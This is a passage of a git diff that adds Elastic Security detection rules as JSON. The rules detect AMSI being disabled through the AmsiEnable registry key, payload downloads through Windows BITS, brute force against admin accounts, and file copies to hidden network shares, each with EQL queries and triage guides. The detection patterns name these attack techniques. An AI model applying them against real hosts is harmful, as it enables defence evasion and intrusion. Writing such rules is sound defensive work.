(\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\"\n ) and\n registry.data.strings: (\"0\", \"0x00000000\")\n", + "references": [ + 
"https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + 
"name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f874315d-5188-4b4a-8521-d1c73093a7e4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_110.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_110.json new file mode 100644 index 00000000000..523cadcba18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_110.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of AmsiEnable Registry Key", + "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade detections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. 
Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\"\n ) and\n registry.data.strings: (\"0\", \"0x00000000\")\n", + "references": [ + 
"https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + 
"name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f874315d-5188-4b4a-8521-d1c73093a7e4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_7.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_7.json new file mode 100644 index 00000000000..e119804a1f6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_7.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Ingress Transfer via Windows BITS", + "note": "## Triage and analysis\n\n### Investigating Ingress Transfer via Windows BITS\n\nWindows Background Intelligent Transfer Service (BITS) is a technology that allows the transfer of files between a client and a server, which makes it a dual-use mechanism, being used by both legitimate apps and attackers. When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process, which can bypass security protections, and it helps to obscure which application requested the transfer.\n\nThis rule identifies such abuse by monitoring for file renaming events involving \"svchost.exe\" and \"BIT*.tmp\" on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Gain context into the BITS transfer.\n - Try to determine the process that initiated the BITS transfer.\n - Search `bitsadmin.exe` processes and examine their command lines.\n - Look for unusual processes loading `Bitsproxy.dll` and other BITS-related DLLs.\n - Try to determine the origin of the file.\n - Inspect network connections initiated by `svchost.exe`.\n - Inspect `Microsoft-Windows-Bits-Client/Operational` Windows logs, specifically the event ID 59, for unusual events.\n - Velociraptor can be used to extract these entries using the [bitsadmin artifact](https://docs.velociraptor.app/exchange/artifacts/pages/bitsadmin/).\n - Check the reputation of the remote server involved in the BITS transfer, such as its IP address or domain, using threat intelligence platforms or online reputation services.\n - Check if the domain is newly registered or unexpected.\n - Use the identified domain as an indicator of compromise (IoCs) to scope other compromised hosts in the environment.\n - [BitsParser](https://github.com/fireeye/BitsParser) can be used to parse BITS database files to extract BITS job information.\n- Examine the details of the dropped file, and whether it was executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved executables using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve 
DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- Known false positives for the rule include legitimate software and system updates that use BITS for downloading files.\n\n### Related Rules\n\n- Persistence via BITS Job Notify Cmdline - c3b915e0-22f3-4bf7-991d-b643513c722f\n- Unsigned BITS Service Client Process - 9a3884d0-282d-45ea-86ce-b9c81100f026\n- Bitsadmin Activity - 8eec4df1-4b4b-4502-b6c3-c788714604c9\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If 
malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\AcroServicesUpdater2_x64.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1197/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": false, + "name": "file.Ext.original.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f95972d3-c23b-463b-89a8-796b3f369b49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1197", + "name": "BITS Jobs", + "reference": "https://attack.mitre.org/techniques/T1197/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "f95972d3-c23b-463b-89a8-796b3f369b49_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_9.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_9.json new file mode 100644 index 00000000000..dbcec091aa2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_9.json 
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive logon failures targeting an Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privileged Account Brute Force", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Status", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to 
@timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_108.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_108.json new file mode 100644 index 00000000000..453667cd7d3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_108.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy to a Hidden Share", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cmd.exe\", \"powershell.exe\", \"xcopy.exe\") and\n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") or\n process.name : \"robocopy.exe\"\n ) and process.args : \"*\\\\\\\\*\\\\*$*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + 
"threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_109.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_109.json new file mode 100644 index 00000000000..35b63ad898a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_109.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy to a Hidden Share", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cmd.exe\", \"powershell.exe\", \"xcopy.exe\") and\n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") or\n process.name : \"robocopy.exe\"\n ) and process.args : \"*\\\\\\\\*\\\\*$*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic 
Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_6.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_6.json new file mode 100644 index 00000000000..ef174d60d09 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_6.json 
